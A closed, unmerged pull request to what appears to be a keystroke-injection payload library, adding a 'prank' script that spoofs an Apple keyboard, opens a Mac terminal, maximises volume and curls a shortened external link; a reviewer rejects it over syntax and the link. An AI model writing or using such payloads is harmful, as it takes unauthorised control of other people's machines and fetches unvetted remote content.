### PR TITLE
Create rick-roll-terminal-may.dd

### PR DESCRIPTION
**Pull request by finnml**
Rick Roll that plays in terminal and cant just be closed

### CODE REVIEW

**Comment by finnml** [comment]
i meant mac not may

File: payloads/library/prank/rick-roll-terminal-may.dd [hunk 1]
```diff
@@ -0,0 +1,19 @@
+ID 05ac:021e Apple:Keyboard
```
Comment (dallaswinger) [inline payloads/library/prank/rick-roll-terminal-may.dd:1]: invalid syntax.

File: payloads/library/prank/rick-roll-terminal-may.dd [hunk 2]
```diff
@@ -0,0 +1,19 @@
...
+COMMAND SPACE
+DELAY 10
+STRING terminal
+DELAY 100
+ENTER
+DELAY 100
+STRING osascript -e 'set volume 10'
+ENTER
+DELAY 1500
+STRING curl -L http://bit.ly/10hA8iC
```
Comment (dallaswinger) [inline payloads/library/prank/rick-roll-terminal-may.dd:12]: unacceptable link

**Comment by dallaswinger** [comment]
typo in file name among other issues 

please correct and resubmit.

**Pull request closed without merging**